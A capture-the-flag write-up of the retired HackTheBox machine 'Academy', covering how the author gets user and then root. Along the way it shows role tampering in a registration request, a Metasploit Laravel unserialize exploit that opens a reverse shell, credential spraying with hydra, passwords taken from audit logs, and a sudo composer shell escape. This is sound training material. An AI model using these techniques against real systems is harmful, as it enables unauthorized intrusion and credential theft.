HTB: Academy

Academy card

This is a writeup about a retired HacktheBox machine: Academy created by egre55 and mrb3n and publish on November 7, 2020. This box is classified as an easy machine. The user part involve a public exploit and some enumeration. The root part implies enumeration and a sudo binary.

User

Recon

We start with an nmap scan. Only ports 22 (SSH), 80 (HTTP) and 33060 (MYSQL) are open.

# Nmap 7.91 scan initiated Wed Nov  11 03:19:47 2020 as: nmap -p- -oN nmap 10.129.39.166
Nmap scan report for 10.129.39.166
Host is up (0.012s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
33060/tcp open  mysqlx

# Nmap done at Wed Nov  11 03:19:55 2020 -- 1 IP address (1 host up) scanned in 8.25 seconds

Web

The website is a new HTB feature (as was swagshop) Academy. We can register an account but most of the functionalities are not working.

Academy homepage

We run a dirb on the website that allow use to find the admin.php endpoint.

$ dirb http://academy.htb/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Nov  11 03:24:21 2020
URL_BASE: http://academy.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://academy.htb/ ----
+ http://academy.htb/admin.php (CODE:200|SIZE:2633)
==> DIRECTORY: http://academy.htb/images/
+ http://academy.htb/index.php (CODE:200|SIZE:2117)
+ http://academy.htb/server-status (CODE:403|SIZE:276)

admin.php

When taking a closer look at the registration request, we can see that there is a post parameter roleid set to 0.

POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://academy.htb
Connection: close
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=pf1cigmrl6la8c0o7lte5jubum
Upgrade-Insecure-Requests: 1

uid=toto&password=toto&confirm=toto&roleid=0

Using Burp and the proxy module, we change the roleid parameter to 1. Our new account can now log into the admin part. Which is mostly a todo list, disclosing the staging environment virtual host.

Academy Launch Planner

Staging

We update our /etc/hosts and browse to the staging environment.

http://dev-staging-01.academy.htb/

Academy staging environment

We see in the disclosed path that the staging environment use the laravel framework which as a few public exploit one of them allowing for remote command execution.

kali@kali:~$ searchsploit laravel
-------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------------------
Laravel - 'Hash::make()' Password Truncation Security                     | multiple/remote/39318.txt
Laravel Log Viewer < 0.13.0 - Local File Download                         | php/webapps/44343.py
PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote  | linux/remote/47129.rb
UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read                 | php/webapps/48166.txt
UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload        | php/webapps/46389.py
-------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The unserialization exploit is a metasploit one. So we fire up msf, load the exploit and configure the options to use the API key (disclosed on the debug page) and our virtual host. Then we run the exploit and get a shell as www-data.

msf5 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

  Name       Current Setting                               Required  Description
  ----       ---------------                               --------  -----------
  APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
  Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     10.129.39.166                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                                            yes       The target port (TCP)
  SSL        false                                         no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                                             yes       Path to target webapp
  VHOST      dev-staging-01.academy.htb                    no        HTTP server virtual host


msf5 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.20:4444
[*] Command shell session 3 opened (10.10.14.20:4444 -> 10.129.39.166:36996) at 2020-11-11 04:11:10 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Foothold

We start enumerating and found a few credentials sets for the database. We also extract the users list from /etc/passwd and run the retrieved creds against the SSH service using hydra. The password stored in acedemy/.env allow us to connect as cry0l1t3 using SSH and grab the user flag.

cat ls ../../academy/.env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file


$ hydra  -L users -p 'mySup3rP4s5w0rd!!' ssh://10.129.39.166
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-11 08:34:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 15 tasks per 1 server, overall 15 tasks, 15 login tries (l:15/p:1), ~1 try per task
[DATA] attacking ssh://10.129.39.166:22/
[22][ssh] host: 10.129.39.166   login: cry0l1t3   password: mySup3rP4s5w0rd!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-11 08:34:09


$ ssh -l cry0l1t3 10.129.39.166
cry0l1t3@10.129.39.166's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)

* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage

  System information as of Wed 11 Nov 2020 01:53:21 PM UTC

  System load:             0.0
  Usage of /:              44.5% of 15.68GB
  Memory usage:            18%
  Swap usage:              0%
  Processes:               171
  Users logged in:         0
  IPv4 address for ens160: 10.129.39.166
  IPv6 address for ens160: dead:beef::250:56ff:feb9:a424


0 updates can be installed immediately.
0 of these updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Nov  11 13:35:52 2020 from 10.10.14.20
$ cat user.txt
c3a5e57a709f0c1bdc6874b9ad7af1b1

Root

lateral movement

Our user is in the adm group. We can run bash to have a better shell.

$ id uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

According to GNU/Linux documentation this group has access to /var/log/ but there is nothing of interest there. We also have access to the aureport command and list the tty access containing mrb3n password.

cry0l1t3@academy:/var/log$ aureport --tty

TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>

Composer

We switch user su to our new mrb3n user and list our sudo persmission. We have sudo access to composer.

cry0l1t3@academy:/var/log$ su mrb3n
Password:
$ bash
mrb3n@academy:/home$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
mrb3n@academy:/home$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Using gtfobins we quickly obtain a root shell and the root flag.

mrb3n@academy:/home$ TF=$(mktemp -d)
mrb3n@academy:/home$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/home$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
c54ee4bf2a048550483176f6cb528d95

Wrapping up

An easy machine mostly based on public exploit and enumeration. I will recommand it to begginers.